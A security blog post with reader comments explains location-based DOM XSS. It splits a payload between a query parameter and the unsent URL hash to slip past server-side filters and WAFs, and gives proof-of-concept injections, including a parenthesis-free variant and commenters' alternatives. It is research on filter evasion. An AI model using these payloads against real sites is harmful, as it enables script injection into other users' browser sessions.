Location based XSS attacks

The basic attack

Using the hash portion of the location is a good way to beat filters, anything sent via the hash is not sent to the server in question. We can use a large amount of data which is hidden from the server side filters and combine it with data sent on the server. For example we can send:-

http://someserver.com/somepage.php?
param=",eval(location.hash.slice(1))//#alert(1)

Data sent to the server :

",eval(location.hash.slice(1))//

Data only sent through the client :

#alert(1)

“slice” simply selects the location.hash from the second character because the # is included and would raise a syntax error.

More advanced variation

There are times when server side filters will remove all instances of “(” or “)” or maybe a WAF will disallow such requests. That alone will not save you from these sort of attacks because there’s a trick you can use to defeat those filters.

Remember the server can only see the server side potion of the attack, we can combine both strings to produce our attack without “(” or “)”. For example:-

http://someserver.com/somepage.php?
param=",location='javascript:/*'+location.hash//#*/alert(1)

Data sent to the server :

",location='javascript:/*'+location.hash//

Data sent to the client :

#*/alert(1)

We start the comment in the server side request and complete it in the client side location.hash request. Location is assigned javascript:/*#*/alert(1) removing the need for the slice(1) as shown previously.

The attacks mentioned are DOM based XSS attacks and are actually more common than you think, they are just more difficult to find than regular XSS.

7 Responses to “Location based XSS attacks”

  1. David Lindsay writes:

    I really like the variation that avoids parenthesis. It’s cleaner than the setter trick and works cross browsers too. I’ll have to update my list of 2-stage injections to include it.

  2. Giorgio Maone writes:

    http://someserver.com/somepage.php?param=“,location=location#%0aalert(1)

  3. Giorgio Maone writes:

    Ooops (damn SpamBam)

    http://someserver.com/somepage.php?param=“,location='javascript:’+location#%0aalert(1)

  4. Giorgio Maone writes:

    BTW, why not the ever green

    http://someserver.com/somepage.php?param=“,location=name

    ?

  5. Gareth Heyes writes:

    Yeah nice ones there’s other ways too but I thought I’d post the comment trick cause it’s nice 🙂

    location=’javascript:alert%25281%2529′

  6. Ivan writes:

    Can anyone explain, in which way this in an xss-attack?

  7. Gareth Heyes writes:

    @ivan

    Look up dom based XSS and that should answer your question.